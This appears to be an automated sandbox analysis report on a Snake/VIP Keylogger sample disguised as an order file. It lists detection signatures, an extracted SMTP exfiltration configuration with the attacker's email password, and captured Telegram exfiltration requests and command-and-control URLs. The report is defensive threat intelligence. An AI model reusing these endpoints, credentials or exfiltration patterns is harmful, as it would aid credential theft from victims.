Windows Analysis Report
NEW FRANCE ORDER.exe

Overview

General Information

Sample name: NEW FRANCE ORDER.exe
Analysis ID: 1650501
MD5: c42c3d3b8cd09debfbeb4917845bfc1c
SHA1: 2894802c2848c43d9ac6833b614ca38f870c02d5
SHA256: 0934fbe06034dbe5749eaaa72e57016b04ae3fc9b66cc8984815ebd3148b1626
Tags: exe, user-threatcat_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

[Classification chart: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean / suspicious / malicious]
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: NEW FRANCE ORDER.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Avira: detection malicious, Label: HEUR/AGEN.1310705
Source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "bank@iaa-airferight.com", "Password": "moneyismade22", "Host": "mail.iaa-airferight.com", "Port": "25"}
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe ReversingLabs: Detection: 66%
Source: NEW FRANCE ORDER.exe Virustotal: Detection: 56%
Source: NEW FRANCE ORDER.exe ReversingLabs: Detection: 66%
Source: Submitted Sample Neural Call Log Analysis: 100.0%
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor: bank@iaa-airferight.com
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor: moneyismade22
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor: mail.iaa-airferight.com
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor: 25
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor:

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: NEW FRANCE ORDER.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49722 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: NEW FRANCE ORDER.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003F7C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003F7C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49740 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49760 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2027/03/2025%20/%2022:36:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2027/03/2025%20/%2021:07:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 46.175.148.58 46.175.148.58
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49726 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49717 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49724 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49727 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.48.1:443
Source: global traffic TCP traffic: 192.168.2.4:49741 -> 46.175.148.58:25
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.iaa-airferight.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 27 Mar 2025 18:18:39 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 27 Mar 2025 18:19:00 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: InstallUtil.exe, 00000007.00000002.2422846155.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000007.00000002.2422846155.00000000033FF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000311C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.iaa-airferight.com
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000315F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000315F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000315F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20a
Source: InstallUtil.exe, 0000000B.00000002.2423370342.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000339F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000339A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003323000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003323000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002FFB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138$
Source: InstallUtil.exe, 0000000B.00000002.2423370342.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138-R
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.orgP
Source: InstallUtil.exe, 0000000B.00000002.2423370342.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.orgh~
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
